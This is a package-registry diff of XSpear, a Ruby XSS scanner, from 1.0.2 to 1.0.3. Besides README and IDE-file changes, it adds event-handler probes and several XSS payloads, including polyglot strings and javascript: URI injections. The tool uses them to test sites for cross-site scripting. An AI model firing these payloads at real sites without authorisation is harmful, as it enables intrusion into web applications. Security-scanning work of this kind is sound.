XSpear 1.0.2 → 1.0.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- data/.idea/workspace.xml +40 -28
- data/README.md +26 -4
- data/XSpear-1.0.2.gem +0 -0
- data/lib/XSpear/version.rb +1 -1
- data/lib/XSpear.rb +119 -5
- metadata +2 -1
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: f7f5c25b7930673a6a500037388b459cbf4e4da94a225c0dc647b1f4d13a956a
|
|
4
|
+
data.tar.gz: 29534ac5308419d4be687ed0d14c5eee69b4cae48c767e3d6433b1d12592cbe8
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: 9e846d4845fc6af2ffbdc0775f0759213ed2c3fd7ea885e56f1dc5f419738e458395f9c293a698c2fd3faf1f19f55b33c34c9a87fb19159728e6e579a772a2b7
|
|
7
|
+
data.tar.gz: de1177287bd050790bed48176fddf8c798f4cc2d250d287937774e19616275901bac511fa8ed33bf03789e782aa4c68ba6e96bd39bf16577b001fbc6b4cb0c98
|
data/.idea/workspace.xml
CHANGED
|
@@ -3,7 +3,7 @@
|
|
|
3
3
|
<component name="ChangeListManager">
|
|
4
4
|
<list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
|
|
5
5
|
<change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
|
|
6
|
-
<change beforePath="$PROJECT_DIR$/XSpear
|
|
6
|
+
<change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
|
|
7
7
|
<change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
|
|
8
8
|
</list>
|
|
9
9
|
<option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
|
|
@@ -38,16 +38,20 @@
|
|
|
38
38
|
</provider>
|
|
39
39
|
</entry>
|
|
40
40
|
</file>
|
|
41
|
-
<file pinned="false" current-in-tab="
|
|
42
|
-
<entry file="file://$PROJECT_DIR$/
|
|
43
|
-
<provider selected="true" editor-type-id="text-editor"
|
|
41
|
+
<file pinned="false" current-in-tab="true">
|
|
42
|
+
<entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
|
|
43
|
+
<provider selected="true" editor-type-id="text-editor">
|
|
44
|
+
<state relative-caret-position="213">
|
|
45
|
+
<caret line="262" column="30" lean-forward="true" selection-start-line="262" selection-start-column="30" selection-end-line="262" selection-end-column="30" />
|
|
46
|
+
</state>
|
|
47
|
+
</provider>
|
|
44
48
|
</entry>
|
|
45
49
|
</file>
|
|
46
50
|
<file pinned="false" current-in-tab="false">
|
|
47
51
|
<entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
|
|
48
52
|
<provider selected="true" editor-type-id="text-editor">
|
|
49
|
-
<state>
|
|
50
|
-
<caret
|
|
53
|
+
<state relative-caret-position="194">
|
|
54
|
+
<caret line="13" lean-forward="true" selection-start-line="13" selection-end-line="13" />
|
|
51
55
|
</state>
|
|
52
56
|
</provider>
|
|
53
57
|
</entry>
|
|
@@ -70,11 +74,11 @@
|
|
|
70
74
|
</provider>
|
|
71
75
|
</entry>
|
|
72
76
|
</file>
|
|
73
|
-
<file pinned="false" current-in-tab="
|
|
77
|
+
<file pinned="false" current-in-tab="false">
|
|
74
78
|
<entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
|
|
75
79
|
<provider selected="true" editor-type-id="text-editor">
|
|
76
80
|
<state relative-caret-position="15">
|
|
77
|
-
<caret line="1" column="
|
|
81
|
+
<caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
|
|
78
82
|
</state>
|
|
79
83
|
</provider>
|
|
80
84
|
</entry>
|
|
@@ -108,12 +112,12 @@
|
|
|
108
112
|
<list>
|
|
109
113
|
<option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
|
|
110
114
|
<option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
|
|
111
|
-
<option value="$PROJECT_DIR$/lib/XSpear.rb" />
|
|
112
115
|
<option value="$PROJECT_DIR$/XSpear.gemspec" />
|
|
113
116
|
<option value="$PROJECT_DIR$/README.md" />
|
|
114
117
|
<option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
|
|
115
118
|
<option value="$PROJECT_DIR$/exe/XSpear" />
|
|
116
119
|
<option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
|
|
120
|
+
<option value="$PROJECT_DIR$/lib/XSpear.rb" />
|
|
117
121
|
</list>
|
|
118
122
|
</option>
|
|
119
123
|
</component>
|
|
@@ -226,7 +230,7 @@
|
|
|
226
230
|
<option name="presentableId" value="Default" />
|
|
227
231
|
<updated>1562942814778</updated>
|
|
228
232
|
<workItem from="1562942816004" duration="15337000" />
|
|
229
|
-
<workItem from="1563638656518" duration="
|
|
233
|
+
<workItem from="1563638656518" duration="3646000" />
|
|
230
234
|
</task>
|
|
231
235
|
<task id="LOCAL-00001" summary="init update">
|
|
232
236
|
<created>1562945899597</created>
|
|
@@ -389,11 +393,18 @@
|
|
|
389
393
|
<option name="project" value="LOCAL" />
|
|
390
394
|
<updated>1563646762017</updated>
|
|
391
395
|
</task>
|
|
392
|
-
<
|
|
396
|
+
<task id="LOCAL-00024" summary="Edit version , release 1.0.2">
|
|
397
|
+
<created>1563646850278</created>
|
|
398
|
+
<option name="number" value="00024" />
|
|
399
|
+
<option name="presentableId" value="LOCAL-00024" />
|
|
400
|
+
<option name="project" value="LOCAL" />
|
|
401
|
+
<updated>1563646850278</updated>
|
|
402
|
+
</task>
|
|
403
|
+
<option name="localTasksCounter" value="25" />
|
|
393
404
|
<servers />
|
|
394
405
|
</component>
|
|
395
406
|
<component name="TimeTrackingManager">
|
|
396
|
-
<option name="totallyTimeSpent" value="
|
|
407
|
+
<option name="totallyTimeSpent" value="18983000" />
|
|
397
408
|
</component>
|
|
398
409
|
<component name="ToolWindowManager">
|
|
399
410
|
<frame x="-1920" y="-620" width="1920" height="1057" extended-state="6" />
|
|
@@ -439,7 +450,8 @@
|
|
|
439
450
|
<MESSAGE value="modify dependency rspec" />
|
|
440
451
|
<MESSAGE value="Change Badge(version)" />
|
|
441
452
|
<MESSAGE value="Add show version & edit help, version in banner" />
|
|
442
|
-
<
|
|
453
|
+
<MESSAGE value="Edit version , release 1.0.2" />
|
|
454
|
+
<option name="LAST_COMMIT_MESSAGE" value="Edit version , release 1.0.2" />
|
|
443
455
|
</component>
|
|
444
456
|
<component name="editorHistoryManager">
|
|
445
457
|
<entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
|
|
@@ -452,23 +464,9 @@
|
|
|
452
464
|
<entry file="file://$PROJECT_DIR$/bin/console">
|
|
453
465
|
<provider selected="true" editor-type-id="text-editor" />
|
|
454
466
|
</entry>
|
|
455
|
-
<entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
|
|
456
|
-
<provider selected="true" editor-type-id="text-editor">
|
|
457
|
-
<state relative-caret-position="1740">
|
|
458
|
-
<caret line="116" column="19" selection-start-line="116" selection-start-column="19" selection-end-line="116" selection-end-column="19" />
|
|
459
|
-
</state>
|
|
460
|
-
</provider>
|
|
461
|
-
</entry>
|
|
462
467
|
<entry file="file://$PROJECT_DIR$/bin/setup">
|
|
463
468
|
<provider selected="true" editor-type-id="text-editor" />
|
|
464
469
|
</entry>
|
|
465
|
-
<entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
|
|
466
|
-
<provider selected="true" editor-type-id="text-editor">
|
|
467
|
-
<state>
|
|
468
|
-
<caret column="9" selection-start-column="9" selection-end-column="23" />
|
|
469
|
-
</state>
|
|
470
|
-
</provider>
|
|
471
|
-
</entry>
|
|
472
470
|
<entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
|
|
473
471
|
<provider selected="true" editor-type-id="text-editor">
|
|
474
472
|
<state relative-caret-position="195">
|
|
@@ -513,10 +511,24 @@
|
|
|
513
511
|
</state>
|
|
514
512
|
</provider>
|
|
515
513
|
</entry>
|
|
514
|
+
<entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
|
|
515
|
+
<provider selected="true" editor-type-id="text-editor">
|
|
516
|
+
<state relative-caret-position="194">
|
|
517
|
+
<caret line="13" lean-forward="true" selection-start-line="13" selection-end-line="13" />
|
|
518
|
+
</state>
|
|
519
|
+
</provider>
|
|
520
|
+
</entry>
|
|
516
521
|
<entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
|
|
517
522
|
<provider selected="true" editor-type-id="text-editor">
|
|
518
523
|
<state relative-caret-position="15">
|
|
519
|
-
<caret line="1" column="
|
|
524
|
+
<caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
|
|
525
|
+
</state>
|
|
526
|
+
</provider>
|
|
527
|
+
</entry>
|
|
528
|
+
<entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
|
|
529
|
+
<provider selected="true" editor-type-id="text-editor">
|
|
530
|
+
<state relative-caret-position="213">
|
|
531
|
+
<caret line="262" column="30" lean-forward="true" selection-start-line="262" selection-start-column="30" selection-end-line="262" selection-end-column="30" />
|
|
520
532
|
</state>
|
|
521
533
|
</provider>
|
|
522
534
|
</entry>
|
data/README.md
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
# XSpear
|
|
2
2
|
XSpear is XSS Scanner on ruby gems
|
|
3
3
|
|
|
4
|
-
<img src="https://img.shields.io/static/v1.svg?label=lang&message=ruby&color=RED"> <img src="https://img.shields.io/gem/v/XSpear.svg"> <img src="https://img.shields.io/gem/
|
|
4
|
+
<img src="https://img.shields.io/static/v1.svg?label=lang&message=ruby&color=RED"> <img src="https://img.shields.io/gem/v/XSpear.svg"> <img src="https://img.shields.io/gem/dt/XSpear.svg"> <img src="https://img.shields.io/github/license/hahwul/XSpear.svg"> <a href="https://twitter.com/intent/follow?screen_name=hahwul"><img src="https://img.shields.io/static/v1.svg?label=follow&message=hahwul&color=black"></a>
|
|
5
5
|
|
|
6
6
|
## Key features
|
|
7
7
|
- Pattern matching based XSS scanning
|
|
@@ -23,7 +23,7 @@ Install it yourself as:
|
|
|
23
23
|
|
|
24
24
|
Or install it yourself as (local file):
|
|
25
25
|
|
|
26
|
-
$ gem install XSpear-
|
|
26
|
+
$ gem install XSpear-{version}.gem
|
|
27
27
|
|
|
28
28
|
Add this line to your application's Gemfile:
|
|
29
29
|
|
|
@@ -66,8 +66,15 @@ $ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
|
|
|
66
66
|
+ v=2 : show scanning log
|
|
67
67
|
+ v=3 : show detail log(req/res)
|
|
68
68
|
-h, --help Prints this help
|
|
69
|
-
--
|
|
69
|
+
--version Show XSpear version
|
|
70
|
+
--update Update with online
|
|
70
71
|
```
|
|
72
|
+
### Result types
|
|
73
|
+
- (I)NFO: Get information ( e.g sql error , filterd rule, reflected params, etc..)
|
|
74
|
+
- (V)UNL: Vulnerable XSS, Checked alert/prompt/confirm with Selenium
|
|
75
|
+
- (L)OW: Low level issue
|
|
76
|
+
- (M)EDIUM: medium level issue
|
|
77
|
+
- (H)IGH: high level issue
|
|
71
78
|
|
|
72
79
|
### Case by Case
|
|
73
80
|
**Scanning XSS**
|
|
@@ -213,6 +220,21 @@ class ScanCallbackFunc()
|
|
|
213
220
|
end
|
|
214
221
|
```
|
|
215
222
|
|
|
223
|
+
## Update
|
|
224
|
+
if nomal user
|
|
225
|
+
```
|
|
226
|
+
$ gem update XSpear
|
|
227
|
+
```
|
|
228
|
+
|
|
229
|
+
if developers (soft)
|
|
230
|
+
```
|
|
231
|
+
$ git pull -v
|
|
232
|
+
```
|
|
233
|
+
if develpers (hard)
|
|
234
|
+
```
|
|
235
|
+
$ git reset --hard HEAD; git pull -v
|
|
236
|
+
```
|
|
237
|
+
|
|
216
238
|
## Development
|
|
217
239
|
|
|
218
240
|
After checking out the repo, run `bin/setup` to install dependencies. Then, run `rake spec` to run the tests. You can also run `bin/console` for an interactive prompt that will allow you to experiment.
|
|
@@ -232,5 +254,5 @@ The gem is available as open source under the terms of the [MIT License](https:/
|
|
|
232
254
|
Everyone interacting in the XSpear project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the [code of conduct](https://github.com/[USERNAME]/XSpear/blob/master/CODE_OF_CONDUCT.md).
|
|
233
255
|
|
|
234
256
|
## ScreenShot
|
|
235
|
-
<img src="https://user-images.githubusercontent.com/13212227/
|
|
257
|
+
<img src="https://user-images.githubusercontent.com/13212227/61582619-ed233700-ab67-11e9-94f7-33cb6af5997c.png" width=100%>
|
|
236
258
|
<img src="https://user-images.githubusercontent.com/13212227/61311071-8b459300-a830-11e9-8e60-c08e984fdacb.png" width=100%>
|
data/XSpear-1.0.2.gem
ADDED
|
Binary file
|
data/lib/XSpear/version.rb
CHANGED
data/lib/XSpear.rb
CHANGED
|
@@ -128,9 +128,116 @@ class XspearScan
|
|
|
128
128
|
|
|
129
129
|
def run
|
|
130
130
|
r = []
|
|
131
|
+
event_handler = [
|
|
132
|
+
'onAbort',
|
|
133
|
+
'onActivate',
|
|
134
|
+
'onAfterPrint',
|
|
135
|
+
'onAfterUpdate',
|
|
136
|
+
'onBeforeActivate',
|
|
137
|
+
'onBeforeCopy',
|
|
138
|
+
'onBeforeCut',
|
|
139
|
+
'onBeforeDeactivate',
|
|
140
|
+
'onBeforeEditFocus',
|
|
141
|
+
'onBeforePaste',
|
|
142
|
+
'onBeforePrint',
|
|
143
|
+
'onBeforeUnload',
|
|
144
|
+
'onBeforeUpdate',
|
|
145
|
+
'onBegin',
|
|
146
|
+
'onBlur',
|
|
147
|
+
'onBounce',
|
|
148
|
+
'onCellChange',
|
|
149
|
+
'onChange',
|
|
150
|
+
'onClick',
|
|
151
|
+
'onContextMenu',
|
|
152
|
+
'onControlSelect',
|
|
153
|
+
'onCopy',
|
|
154
|
+
'onCut',
|
|
155
|
+
'onDataAvailable',
|
|
156
|
+
'onDataSetChanged',
|
|
157
|
+
'onDataSetComplete',
|
|
158
|
+
'onDblClick',
|
|
159
|
+
'onDeactivate',
|
|
160
|
+
'onDrag',
|
|
161
|
+
'onDragEnd',
|
|
162
|
+
'onDragLeave',
|
|
163
|
+
'onDragEnter',
|
|
164
|
+
'onDragOver',
|
|
165
|
+
'onDragDrop',
|
|
166
|
+
'onDragStart',
|
|
167
|
+
'onDrop',
|
|
168
|
+
'onEnd',
|
|
169
|
+
'onError',
|
|
170
|
+
'onErrorUpdate',
|
|
171
|
+
'onFilterChange',
|
|
172
|
+
'onFinish',
|
|
173
|
+
'onFocus',
|
|
174
|
+
'onFocusIn',
|
|
175
|
+
'onFocusOut',
|
|
176
|
+
'onHashChange',
|
|
177
|
+
'onHelp',
|
|
178
|
+
'onInput',
|
|
179
|
+
'onKeyDown',
|
|
180
|
+
'onKeyPress',
|
|
181
|
+
'onKeyUp',
|
|
182
|
+
'onLayoutComplete',
|
|
183
|
+
'onLoad',
|
|
184
|
+
'onLoseCapture',
|
|
185
|
+
'onMediaComplete',
|
|
186
|
+
'onMediaError',
|
|
187
|
+
'onMessage',
|
|
188
|
+
'onMouseDown',
|
|
189
|
+
'onMouseEnter',
|
|
190
|
+
'onMouseLeave',
|
|
191
|
+
'onMouseMove',
|
|
192
|
+
'onMouseOut',
|
|
193
|
+
'onMouseOver',
|
|
194
|
+
'onMouseUp',
|
|
195
|
+
'onMouseWheel',
|
|
196
|
+
'onMove',
|
|
197
|
+
'onMoveEnd',
|
|
198
|
+
'onMoveStart',
|
|
199
|
+
'onOffline',
|
|
200
|
+
'onOnline',
|
|
201
|
+
'onOutOfSync',
|
|
202
|
+
'onPaste',
|
|
203
|
+
'onPause',
|
|
204
|
+
'onPopState',
|
|
205
|
+
'onProgress',
|
|
206
|
+
'onPropertyChange',
|
|
207
|
+
'onReadyStateChange',
|
|
208
|
+
'onRedo',
|
|
209
|
+
'onRepeat',
|
|
210
|
+
'onReset',
|
|
211
|
+
'onResize',
|
|
212
|
+
'onResizeEnd',
|
|
213
|
+
'onResizeStart',
|
|
214
|
+
'onResume',
|
|
215
|
+
'onReverse',
|
|
216
|
+
'onRowsEnter',
|
|
217
|
+
'onRowExit',
|
|
218
|
+
'onRowDelete',
|
|
219
|
+
'onRowInserted',
|
|
220
|
+
'onScroll',
|
|
221
|
+
'onSeek',
|
|
222
|
+
'onSelect',
|
|
223
|
+
'onSelectionChange',
|
|
224
|
+
'onSelectStart',
|
|
225
|
+
'onStart',
|
|
226
|
+
'onStop',
|
|
227
|
+
'onStorage',
|
|
228
|
+
'onSyncRestored',
|
|
229
|
+
'onSubmit',
|
|
230
|
+
'onTimeError',
|
|
231
|
+
'onTrackChange',
|
|
232
|
+
'onUndo',
|
|
233
|
+
'onUnload',
|
|
234
|
+
'onURLFlip'
|
|
235
|
+
]
|
|
236
|
+
|
|
131
237
|
log('s', 'creating a test query.')
|
|
132
238
|
r.push makeQueryPattern('d', 'XsPeaR"', 'XsPeaR"', 'i', "Found SQL Error Pattern", CallbackErrorPatternMatch)
|
|
133
239
|
r.push makeQueryPattern('r', 'rEfe6', 'rEfe6', 'i', 'reflected parameter', CallbackStringMatch)
|
|
240
|
+
# Check Special Chat
|
|
134
241
|
r.push makeQueryPattern('f', 'XsPeaR>', 'XsPeaR>', 'i', "not filtered "+">".blue, CallbackStringMatch)
|
|
135
242
|
r.push makeQueryPattern('f', '<XsPeaR', '<XsPeaR', 'i', "not filtered "+"<".blue, CallbackStringMatch)
|
|
136
243
|
r.push makeQueryPattern('f', 'XsPeaR"', 'XsPeaR"', 'i', "not filtered "+'"'.blue, CallbackStringMatch)
|
|
@@ -151,14 +258,21 @@ class XspearScan
|
|
|
151
258
|
r.push makeQueryPattern('f', 'XsPeaR-', 'XsPeaR-', 'i', "not filtered "+"-".blue, CallbackStringMatch)
|
|
152
259
|
r.push makeQueryPattern('f', 'XsPeaR=', 'XsPeaR=', 'i', "not filtered "+"=".blue, CallbackStringMatch)
|
|
153
260
|
r.push makeQueryPattern('f', 'XsPeaR$', 'XsPeaR$', 'i', "not filtered "+"$".blue, CallbackStringMatch)
|
|
261
|
+
# Check Event Handler
|
|
262
|
+
r.push makeQueryPattern('f', '<xspear/onhwul=64>', 'onhwul=64', 'i', "not filtered event handler "+"on{any} pattern".blue, CallbackStringMatch)
|
|
263
|
+
event_handler.each do |ev|
|
|
264
|
+
r.push makeQueryPattern('f', "\"<xspear #{ev}=64>", "#{ev}=64", 'i', "not filtered event handler "+"#{ev}=64".blue, CallbackStringMatch)
|
|
265
|
+
end
|
|
154
266
|
r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
|
|
155
267
|
r.push makeQueryPattern('x', '<svg/onload=alert(45)>', '<svg/onload=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
|
|
156
268
|
r.push makeQueryPattern('x', '<img/src onerror=alert(45)>', '<img/src onerror=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
|
|
157
|
-
r.push makeQueryPattern('x', '"><
|
|
158
|
-
r.push makeQueryPattern('x', '
|
|
159
|
-
r.push makeQueryPattern('x', '
|
|
160
|
-
r.push makeQueryPattern('x', '
|
|
161
|
-
r.push makeQueryPattern('x', '
|
|
269
|
+
r.push makeQueryPattern('x', '"><iframe/src=JavaScriPt:alert(45)>', '"><iframe/src=JavaScriPt:alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
|
|
270
|
+
r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered "+"<script>alert(45)</script>".red, CallbackXSSSelenium)
|
|
271
|
+
r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered "+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
|
|
272
|
+
r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
|
|
273
|
+
r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
|
|
274
|
+
r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//--><<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
|
|
275
|
+
r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
|
|
162
276
|
r = r.flatten
|
|
163
277
|
r = r.flatten
|
|
164
278
|
log('s', "test query generation is complete. [#{r.length} query]")
|
metadata
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: XSpear
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 1.0.
|
|
4
|
+
version: 1.0.3
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- hahwul
|
|
@@ -157,6 +157,7 @@ files:
|
|
|
157
157
|
- LICENSE.txt
|
|
158
158
|
- README.md
|
|
159
159
|
- Rakefile
|
|
160
|
+
- XSpear-1.0.2.gem
|
|
160
161
|
- XSpear.gemspec
|
|
161
162
|
- bin/console
|
|
162
163
|
- bin/setup
|